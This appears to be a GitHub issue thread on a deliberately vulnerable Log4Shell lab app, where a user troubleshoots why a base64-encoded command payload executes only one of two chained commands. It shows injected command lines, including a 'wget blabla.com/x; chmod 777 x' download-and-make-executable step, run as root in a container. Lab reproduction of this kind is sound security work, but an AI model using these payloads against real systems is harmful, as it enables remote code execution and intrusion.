log4shell-vulnerable-app icon indicating copy to clipboard operation
log4shell-vulnerable-app copied to clipboard

Published 20 hours ago verified publisher icon christophetd

error..

Open scotch123 opened this issue 3 years ago • 4 comments

i'm trying to replicate the log4j environment but when i'm executing the base64 payload which is : "uname -a;id' .. it only execute the second command : id... it doesn't execute both commands.. can you tell me why ?..

Thanks you!

scotch123 avatar Jan 19 '22 19:01 scotch123

Not sure, have you tried uname -a && id?

christophetd avatar Jan 19 '22 23:01 christophetd

yes i did.. it doesn't matter what command i put .. i can put : wget blabla.com/x; chmod 777 x".. but it doesnt take all both commands.. only one of them.. any idea why ? The log seems to be ok .. But if i put 2 commands with ; between or && .. doesn't work :ss.. im trying to fix this since 3h ago and still nothing.. :-s

scotch123 avatar Jan 19 '22 23:01 scotch123

here is an example:

scotch123 avatar Jan 19 '22 23:01 scotch123

echo "uname -a && id >/tmp/bla" |base64 ... here is the reply :

~# docker exec -it 6e31c19206a0 sh / # cat /tmp/bla uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) / #

Uname comments is missing..

scotch123 avatar Jan 19 '22 23:01 scotch123